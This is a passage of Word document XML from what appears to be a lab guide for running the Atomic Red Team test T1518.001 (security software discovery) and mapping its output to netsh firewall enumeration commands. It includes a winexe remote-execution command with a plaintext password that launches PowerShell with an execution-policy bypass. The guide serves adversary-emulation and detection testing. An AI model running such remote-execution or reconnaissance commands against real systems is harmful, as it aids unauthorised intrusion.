          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> T1518.001-1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TestNumbers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CheckPrereqs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PathToAtomicsFolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\\Users\\Public\\AtomicRedTeam\\atomics -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Confirm:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">$false"  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3A3F7658" w14:textId="12987403">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -U victim%asdfzxc123 //192.168.0.135 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -Command Import-Module C:\\Users\\Public\\AtomicRedTeam\\invoke-atomicredteam\\Invoke-AtomicRedTeam.psd1; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> T1518.001-1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TestNumbers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GetPrereqs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PathToAtomicsFolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\\Users\\Public\\AtomicRedTeam\\atomics -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Confirm:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">$false"  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003566BB" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3C71CEDB" w14:textId="7DA75607">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>T1518.001 does not have any prerequisites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5F7F6F11" w14:textId="5AA7D0E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890122" w:id="6"/>
      <w:r>
        <w:t>3.2 Mapping Output to Commands</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="503E0BEB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="33F2B962" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The output from the atomic test should be many </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>hundereds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> of lines long. To map the commands run in the configuration </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (found at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">/atomics/T1518.001/T1518.001.yaml) please refer to the following that lists the first few lines of each section and their associated command. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="01BEC50A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0E99BB58" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netsh.exe Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3AB4E6FA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firewall and network profile info:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="490DE4A7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ports currently open on all network interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3509C0B9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="52333BD1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>IMPORTANT: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall" is deprecated...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="128AAD20" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6D206330" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>netsh.exe firewall show config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0E8A1BFB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>netsh.exe firewall show state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6360231B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">netsh.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>allprofiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7A2FA21D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">netsh.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall show rule name=all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="106B348A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">These commands show </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>open ports, firewall config</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>profile settings</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7BCB4B4D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4114B984" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain profile configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="531DD00C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Domain profile configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="39C3470F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1389D71B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Operational mode = Disable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2A0DD351" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Exception mode = Enable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6F70A037" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4EBF5D5C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1E6D642C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">netsh.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>currentprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="65A8A5FA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rules like File and Printer Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="11F4584A" w14:textId="77777777">
